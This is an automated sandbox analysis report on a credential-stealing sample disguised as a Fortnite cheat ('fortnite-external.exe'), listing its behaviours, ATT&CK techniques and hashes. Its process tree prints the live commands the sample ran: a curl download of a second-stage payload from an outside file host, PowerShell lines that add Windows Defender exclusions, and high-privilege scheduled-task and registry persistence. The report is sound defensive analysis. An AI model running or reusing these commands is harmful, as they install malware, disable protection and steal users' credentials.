30a300329684903e2ca4a937aacbfb337ab30474aadd40e473ca544e8069c52d

Resubmissions

21-09-2024 08:16

240921-j6g5fasglk 10

Analysis

max time kernel
143s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2024 08:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fortnite-external.exe
Size

392KB
MD5

450270d6a68cf6364e98f16b917a84e6
SHA1

3e89467c9cbc12a76ab77c50913ee45420e16ccc
SHA256

30a300329684903e2ca4a937aacbfb337ab30474aadd40e473ca544e8069c52d
SHA512

27c7b9c03a026ba578d6c71f6805d07a702740ce21f2e738cadb7fd2d455d6b1abf620c5b147ee018494a33376ff4e907bdf8ce0fa76f7970abe6cd03da6b4b6
SSDEEP

6144:whcdTWDsDiY4ElESAtEnESbkaXOahqJiSxRODbGWrZjkmn35GYrZ8RA:fdxE7xr4kmnJ

Score

10^/10

credential_access discovery execution persistence spyware stealer

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\fortnite-external.exe\""	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\fortnite-external.exe\", \"C:\\Edge\\msedge.exe\""	msedge.exe

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	972	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	972	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5044	972	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	928	972	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4400	972	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	972	schtasks.exe	95

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3524	powershell.exe
5016	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	fortnite-external.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	physmeme.exe

Executes dropped EXE 3 IoCs

pid	Process
872	physmeme.exe
1140	msedge.exe
3316	msedge.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fortnite-external = "\"C:\\Users\\Admin\\AppData\\Local\\fortnite-external.exe\""	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Edge\\msedge.exe\""	msedge.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSCD91F86F4D72645DCACF1C669C579465.TMP	csc.exe
File created	\??\c:\Windows\System32\3uu4gi.exe	csc.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	\??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC6A70EF7766C481888179490F3D4B3C4.TMP	csc.exe
File created	\??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	csc.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Speech\physmeme.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5004	PING.EXE

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5004	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4400	schtasks.exe
3868	schtasks.exe
1112	schtasks.exe
1088	schtasks.exe
5044	schtasks.exe
928	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
1140	msedge.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
5016	powershell.exe
5016	powershell.exe
5016	powershell.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe
3316	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1140	msedge.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	3316	msedge.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 436 wrote to memory of 3848	436	fortnite-external.exe	90
PID 436 wrote to memory of 3848	436	fortnite-external.exe	90
PID 3848 wrote to memory of 3940	3848	cmd.exe	91
PID 3848 wrote to memory of 3940	3848	cmd.exe	91
PID 436 wrote to memory of 872	436	fortnite-external.exe	96
PID 436 wrote to memory of 872	436	fortnite-external.exe	96
PID 436 wrote to memory of 872	436	fortnite-external.exe	96
PID 872 wrote to memory of 2728	872	physmeme.exe	97
PID 872 wrote to memory of 2728	872	physmeme.exe	97
PID 872 wrote to memory of 2728	872	physmeme.exe	97
PID 2728 wrote to memory of 2340	2728	WScript.exe	103
PID 2728 wrote to memory of 2340	2728	WScript.exe	103
PID 2728 wrote to memory of 2340	2728	WScript.exe	103
PID 2340 wrote to memory of 1140	2340	cmd.exe	105
PID 2340 wrote to memory of 1140	2340	cmd.exe	105
PID 1140 wrote to memory of 4968	1140	msedge.exe	109
PID 1140 wrote to memory of 4968	1140	msedge.exe	109
PID 4968 wrote to memory of 1752	4968	csc.exe	111
PID 4968 wrote to memory of 1752	4968	csc.exe	111
PID 1140 wrote to memory of 3400	1140	msedge.exe	112
PID 1140 wrote to memory of 3400	1140	msedge.exe	112
PID 3400 wrote to memory of 3968	3400	csc.exe	114
PID 3400 wrote to memory of 3968	3400	csc.exe	114
PID 1140 wrote to memory of 5016	1140	msedge.exe	118
PID 1140 wrote to memory of 5016	1140	msedge.exe	118
PID 1140 wrote to memory of 3524	1140	msedge.exe	119
PID 1140 wrote to memory of 3524	1140	msedge.exe	119
PID 1140 wrote to memory of 2908	1140	msedge.exe	122
PID 1140 wrote to memory of 2908	1140	msedge.exe	122
PID 2908 wrote to memory of 2152	2908	cmd.exe	124
PID 2908 wrote to memory of 2152	2908	cmd.exe	124
PID 2908 wrote to memory of 5004	2908	cmd.exe	125
PID 2908 wrote to memory of 5004	2908	cmd.exe	125
PID 2908 wrote to memory of 3316	2908	cmd.exe	128
PID 2908 wrote to memory of 3316	2908	cmd.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe
"C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3848
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3940
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Edge\fu4i1MBsp.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2340
    - - C:\Edge\msedge.exe
        
        "C:\Edge/msedge.exe"
        5⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1140
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i50u4x2j\i50u4x2j.cmdline"
        6⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA709.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6A70EF7766C481888179490F3D4B3C4.TMP"
        7⤵
        
        PID:1752
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\134wdrqe\134wdrqe.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:3400
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA786.tmp" "c:\Windows\System32\CSCD91F86F4D72645DCACF1C669C579465.TMP"
        7⤵
        
        PID:3968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\fortnite-external.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bA36qF3DRW.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2908
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2152
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5004
        
        C:\Edge\msedge.exe
        
        "C:\Edge\msedge.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4444,i,6510295916244954942,10164894160290787457,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8
1⤵
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite-external" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Edge\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe

Filesize
192B

MD5
e5437373d0605c93bc97b65a4a12d739

SHA1
671858874a65fd9c7d3de894ba4c590b537f0bde

SHA256
9440e1281d71c9d954fb0510d3eb29a1270d10eca8394744c5bd91e2e6f83307

SHA512
5345d25ba8cbd179fddbc1255e26e5d3f5e2161e99e4be3bfba1ece5ae317c22df8e115415e300ca5763bd993fb45aa0f5cfca0278c8a6eabb29d48548cf0d2f

Download Submit
C:\Edge\fu4i1MBsp.bat

Filesize
63B

MD5
f797a77c821b724238a50a77f0fe1aae

SHA1
ee9ff366bdfcba73d9ca0753670f2660baaec9f2

SHA256
00c0f57e5f833e74c22e63732816c59eb1f9b8cff197eea7373c32aac58d08d7

SHA512
04459b565bd18d707af3740f3f76050dc8d1f5cb4d335460fcc9c3658695558b9bf67e82beb25996c86ee7ba4a2705eaa4da55facc44fa1e854552cd49d8aa23

Download Submit
C:\Edge\msedge.exe

Filesize
1.8MB

MD5
9257cb2730e4744e1fd4565dec8eb3c8

SHA1
a9147f6de05447b78bd78b71517a650028498836

SHA256
2964966063f51dd2c3d381468a9d9091d8581442b9d63564af056274cb797061

SHA512
0b2228b607a3aa0302515312ab5f9cf86b78c44b94bba7a53507afba00d55208d1387585cd8c0714a9c66831bf99036d91fb81398d6806fd2e086d6019e67e6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Filesize
1KB

MD5
af6acd95d59de87c04642509c30e81c1

SHA1
f9549ae93fdb0a5861a79a08f60aa81c4b32377b

SHA256
7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

SHA512
93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA709.tmp

Filesize
1KB

MD5
d98f6842cb9d1054656f1473234443f1

SHA1
520bac3985e119520f1b25dc8ec09394e7d12e62

SHA256
0397dddc7bb13025734c78ceb52b0fdb24143f9353b51d8155530fba6f05af1f

SHA512
17e67fc33b66354b8d98ea0291a8cdc7c3467b358b2effe4e5944c4246e1956af3c9121dc43ada6682caec30dd609ac2998e9d7bd3082ea2acc3966b681ec00a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA786.tmp

Filesize
1KB

MD5
c97ff1c3b31db42238f7525954fe86dd

SHA1
cc6b3fe9b170857be6dfdc3b9240d5717a9f0f6e

SHA256
a17f906c89d7911e127f3789fda1e6354075c730d6e527a867e114bcd78cbf23

SHA512
37b281f2916fb4d407d3a43bbb3739861dd2b474aeb7b9b838942052ae24076e68c24de54e26da6f9323e792c81d98f350cc174e2d58a73315cb357ee71143b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_atmjmca1.q2f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bA36qF3DRW.bat

Filesize
146B

MD5
6e35563589daefa01d7cca8a25555e4f

SHA1
42e5c4252e14e4cafa90b85f8727ee264a68f803

SHA256
e9abbbe1aa457f5587f270ab47281892ceaa1669cdb0054d8173e759bbfa2e52

SHA512
f5722c95188d3816b9c9d205b7b0190fed6444964ac42221d117d1f8e5cfb7593396771c7e503e2e86fd7357aa0e1ec5044979d44ab3b2d6c541fbc8e2dd3eb4

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
2.1MB

MD5
e5f3f9c01d860a57b5dbc30b44ab4ba0

SHA1
4a7a9c4aba1968491fcabea3abeaa5ecf3fcb71d

SHA256
bd86ed3a268c8e85089ad0602b8894a6463b61569d64b92b63a4c5ab5fed5c0b

SHA512
e771a3370cc9706be105ccf8e732e4502845bdbd2b26d9b47ec5766497f419157e01baccd36c8e418fb25de284effcef2da6683f62ca561786c7353140e0a55f

Download Submit
\??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC6A70EF7766C481888179490F3D4B3C4.TMP

Filesize
1KB

MD5
b5189fb271be514bec128e0d0809c04e

SHA1
5dd625d27ed30fca234ec097ad66f6c13a7edcbe

SHA256
e1984ba1e3ff8b071f7a320a6f1f18e1d5f4f337d31dc30d5bdfb021df39060f

SHA512
f0fcb8f97279579beb59f58ea89527ee0d86a64c9de28300f14460bec6c32dda72f0e6466573b6654a1e992421d6fe81ae7cce50f27059f54cf9fdca6953602e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\134wdrqe\134wdrqe.0.cs

Filesize
382B

MD5
33edf35f694747a4caadf60b7eb0d68c

SHA1
5a95b0801f8d209eaee60bd64397ab76b7068e5f

SHA256
538520dc049cdcf4d615414177e2167d2401e3e6d6f9c81a8b389617366bed46

SHA512
1179372052cdbb23fdb702621ca1135a70486ba8f38463a26a35fee99c53fc6732f20325583b32950ad38667ca6ca6090a420387d5f5f682a91e1956dd2925a4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\134wdrqe\134wdrqe.cmdline

Filesize
235B

MD5
a2847588ceba122572c25863917a9be6

SHA1
48e4f5a24c66ac51bb0948bc16e0004aad8f8c66

SHA256
63066661841259c784f15c758c1d467b2fefc95656a8e9be6e05adf1dec3ef79

SHA512
56112df99fdddc6c60f5b10e618547790913144632fdcfb65176b02dfd7e39c1d934ee682575369a1007af8214fb7867e0412ba618dee3d73646ea00192ef0ed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i50u4x2j\i50u4x2j.0.cs

Filesize
412B

MD5
a31eab869b3c0107213886b0c46e1d4f

SHA1
33551198295328bf56810d5916b9870ddb75b442

SHA256
a4397b2dfc6623b37f9ec12e4280c8eb5f0632871bc07ca5db68af2039bda99c

SHA512
1aa22433b4c609dc18402813cddf290f0f41c2985272987f5c5cf8d8345e72052710ad884fbf931a5c290098818e21806aa1864b08d5df593649513aabd414d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i50u4x2j\i50u4x2j.cmdline

Filesize
265B

MD5
bbb9baf79da82c0c5340b90ea1f41a95

SHA1
f3b7fa6e1e4bb72c367ee06d29b348e126402bce

SHA256
6626b34c2bb13a6b2fa74fb2bfcc41b833670829b834c2264f2e2c6c388a58b0

SHA512
c1aa3a6377eaca9e7de77c23e84dd35b941b8d2a88e0ae162099217f354c3ab51c97e0e6406c86f41f077de1fdd02eacf89d1a823192003d61502f7782f3c6ad

Download Submit
\??\c:\Windows\System32\CSCD91F86F4D72645DCACF1C669C579465.TMP

Filesize
1KB

MD5
defac805d7edc8907512384855c67e24

SHA1
b0b59b7f5f6b872236a383a2381fbdcc7b2b630e

SHA256
57cf2da2350701d9232969935334b4bbda42f10945aac7757c951108e0bd24fc

SHA512
5dcbdf30678b41c0916b0cf60575ea0029a0acb3ebf2f3a38019d2ce83619a007cc75c8109395d33e1c083cb10a92dc9e94b2b6208526051c0e563448eb10b1f

Download Submit
memory/1140-19-0x000000001B170000-0x000000001B18C000-memory.dmp

Filesize
112KB

Download
memory/1140-58-0x000000001B8E0000-0x000000001B989000-memory.dmp

Filesize
676KB

Download
memory/1140-24-0x0000000002760000-0x000000000276C000-memory.dmp

Filesize
48KB

Download
memory/1140-22-0x000000001B190000-0x000000001B1A8000-memory.dmp

Filesize
96KB

Download
memory/1140-20-0x000000001B1E0000-0x000000001B230000-memory.dmp

Filesize
320KB

Download
memory/1140-17-0x0000000000E20000-0x0000000000E2E000-memory.dmp

Filesize
56KB

Download
memory/1140-15-0x0000000000460000-0x000000000063A000-memory.dmp

Filesize
1.9MB

Download
memory/3316-89-0x000000001CF30000-0x000000001CFD9000-memory.dmp

Filesize
676KB

Download
memory/3524-57-0x0000020D91890000-0x0000020D918B2000-memory.dmp

Filesize
136KB

Download